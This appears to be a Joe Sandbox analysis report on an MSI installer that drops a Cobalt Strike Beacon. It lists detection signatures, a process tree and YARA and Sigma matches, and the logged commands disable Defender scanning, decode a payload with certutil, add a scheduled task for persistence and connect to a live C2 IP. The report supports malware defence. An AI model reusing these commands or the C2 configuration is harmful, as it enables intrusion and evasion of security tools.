Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1eSOBjseu2.msi

Overview

General Information

Sample name:1eSOBjseu2.msi
renamed because original name is a hash value
Original sample name:29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680.msi
Analysis ID:1487470
MD5:616bc662c460329dd73754a96e59277b
SHA1:0131fc44067c83e3efd8dfe12029e7df0b44f4a3
SHA256:29dd2916c20e18b713a8ecb72d3df632961e818cf35484ec6bafedc2ff415680
Tags:45-76-192-215CobaltStrikemsi
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 7640 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1eSOBjseu2.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7712 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7784 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0985FCADD1B04D258216E8A4DAB0DBB9 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • aipackagechainer.exe (PID: 7912 cmdline: "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe" MD5: 10F3B7105634BEF29E229ECDA63E08C1)
      • Desktop.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exe" MD5: D2733BF9C81DDF4F730C65FCE8E02629)
        • cmd.exe (PID: 8020 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8072 cmdline: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7688 cmdline: powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • certutil.exe (PID: 4268 cmdline: certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe MD5: F17616EC0522FC5633151F7CAA278CAA)
          • schtasks.exe (PID: 7904 cmdline: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • WmiPrvSE.exe (PID: 7928 cmdline: C:\Users\Public\WmiPrvSE.exe MD5: 29FA5E4FD104FD12A870D2DD90E42B31)
      • powershell.exe (PID: 8116 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_4A51.ps1 -paths 'C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE','C:\Users\user\AppData\Roaming\WmiPrvSE' -retry_count 10" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1148 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1840 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 932 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3756 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 59611, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "45.76.192.215,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
SourceRuleDescriptionAuthorStrings
00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
      00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
          • 0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
          • 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
          • 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
          • 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes!
          • 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
          • 0x3136a:$a11: Could not open service control manager on %s: %d
          • 0x3189c:$a12: %d is an x64 process (can't inject x86 content)
          • 0x318cc:$a13: %d is an x86 process (can't inject x64 content)
          • 0x31bed:$a14: Failed to impersonate logged on user %d (%u)
          • 0x31855:$a15: could not create remote thread in %d: %d
          • 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
          • 0x31803:$a17: could not write to process memory: %d
          • 0x3139b:$a18: Could not create service %s on %s: %d
          • 0x31424:$a19: Could not delete service %s on %s: %d
          • 0x31289:$a20: Could not open process token: %d (%u)
          Click to see the 28 entries
          SourceRuleDescriptionAuthorStrings
          23.2.WmiPrvSE.exe.1a0000.0.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
            23.2.WmiPrvSE.exe.1a0000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
              23.2.WmiPrvSE.exe.1a0000.0.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
                23.2.WmiPrvSE.exe.1a0000.0.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
                • 0x303a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                • 0x3041b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                • 0x3047e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                • 0x304c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
                • 0x30502:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
                • 0x30538:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
                • 0x30160:$a39: %s as %s\%s: %d
                • 0x30394:$a40: %s.1%x.%x%x.%s
                • 0x3e7e2:$a41: beacon.x64.dll
                • 0x30387:$a43: www6.%x%x.%s
                • 0x3037b:$a44: cdn.%x%x.%s
                • 0x30360:$a47: beacon.dll
                • 0x302d8:$a48: %s%s: %s
                • 0x3018c:$a50: %02d/%02d/%02d %02d:%02d:%02d
                • 0x301b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
                23.2.WmiPrvSE.exe.1a0000.0.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
                • 0x1c13c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
                Click to see the 40 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\WmiPrvSE.exe, CommandLine: C:\Users\Public\WmiPrvSE.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\WmiPrvSE.exe, NewProcessName: C:\Users\Public\WmiPrvSE.exe, OriginalFileName: C:\Users\Public\WmiPrvSE.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\WmiPrvSE.exe, ProcessId: 7928, ProcessName: WmiPrvSE.exe
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\WmiPrvSE.exe
                Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\WmiPrvSE.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", ProcessId: 8072, ProcessName: powershell.exe
                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.76.192.215, DestinationIsIpv6: false, DestinationPort: 59611, EventID: 3, Image: C:\Users\Public\WmiPrvSE.exe, Initiated: true, ProcessId: 7928, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49709
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\certutil.exe, ProcessId: 4268, TargetFilename: C:\Users\Public\WmiPrvSE.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", ProcessId: 8072, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f, CommandLine: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f, CommandLine|base64offset|contains: ISj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f, ProcessId: 7904, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\WmiPrvSE.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8020, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "Add-MpPreference -ExclusionPath 'C:\Users\Public'", ProcessId: 8072, ProcessName: powershell.exe
                No Snort rule has matched
                Timestamp:2024-08-04T10:50:20.504465+0200
                SID:2028765
                Source Port:49727
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:24.645131+0200
                SID:2028765
                Source Port:49728
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:25.974308+0200
                SID:2028765
                Source Port:49709
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:58.207552+0200
                SID:2028765
                Source Port:49739
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:54.020089+0200
                SID:2028765
                Source Port:49738
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:52:15.502310+0200
                SID:2028765
                Source Port:49753
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:53.942300+0200
                SID:2028765
                Source Port:49752
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:15.363918+0200
                SID:2028765
                Source Port:49743
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:42.770077+0200
                SID:2028765
                Source Port:49716
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:12.223343+0200
                SID:2028765
                Source Port:49724
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:34.473035+0200
                SID:2028765
                Source Port:49713
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:36.661240+0200
                SID:2028765
                Source Port:49748
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:52:58.727770+0200
                SID:2028765
                Source Port:49756
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:40.974734+0200
                SID:2028765
                Source Port:49749
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:23.926397+0200
                SID:2028765
                Source Port:49745
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:59.569541+0200
                SID:2028765
                Source Port:49720
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:55.410705+0200
                SID:2028765
                Source Port:49719
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:10.957648+0200
                SID:2028765
                Source Port:49742
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:37.082541+0200
                SID:2028765
                Source Port:49734
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:08.067115+0200
                SID:2028765
                Source Port:49722
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:46.926281+0200
                SID:2028765
                Source Port:49717
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:38.629362+0200
                SID:2028765
                Source Port:49715
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:30.113760+0200
                SID:2028765
                Source Port:49710
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:02.382474+0200
                SID:2028765
                Source Port:49740
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:28.785697+0200
                SID:2028765
                Source Port:49729
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:32.287106+0200
                SID:2028765
                Source Port:49747
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:32.926309+0200
                SID:2028765
                Source Port:49730
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:28.113855+0200
                SID:2028765
                Source Port:49746
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:45.459277+0200
                SID:2028765
                Source Port:49736
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:03.723112+0200
                SID:2028765
                Source Port:49721
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:49.816896+0200
                SID:2028765
                Source Port:49737
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:45.348642+0200
                SID:2028765
                Source Port:49750
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:16.364615+0200
                SID:2028765
                Source Port:49725
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:49.770269+0200
                SID:2028765
                Source Port:49751
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:49:51.144968+0200
                SID:2028765
                Source Port:49718
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:50:41.254582+0200
                SID:2028765
                Source Port:49735
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:19.723963+0200
                SID:2028765
                Source Port:49744
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic
                Timestamp:2024-08-04T10:51:06.582745+0200
                SID:2028765
                Source Port:49741
                Destination Port:59611
                Protocol:TCP
                Classtype:Unknown Traffic

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\Public\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1344321
                Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 59611, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "45.76.192.215,/load", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
                Source: C:\Users\Public\WmiPrvSE.exeReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeReversingLabs: Detection: 47%
                Source: 1eSOBjseu2.msiVirustotal: Detection: 32%Perma Link
                Source: 1eSOBjseu2.msiReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.1% probability
                Source: C:\Users\Public\WmiPrvSE.exeJoe Sandbox ML: detected
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00761184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,23_2_00761184
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00792020 CryptGenRandom,23_2_00792020
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00792010 CryptReleaseContext,23_2_00792010

                Compliance

                barindex
                Source: C:\Users\Public\WmiPrvSE.exeUnpacked PE file: 23.2.WmiPrvSE.exe.760000.2.unpack
                Source: Binary string: b.pdb>w source: powershell.exe, 0000000D.00000002.1527530521.000000000279D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000004.00000000.1428985582.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, 1eSOBjseu2.msi, aipackagechainer.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdbOS= source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: HP<oXC:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1565225176.0000000006A69000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1576734611.00000000076B9000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1583062786.00000000069D9000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1581398989.0000000007B3E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
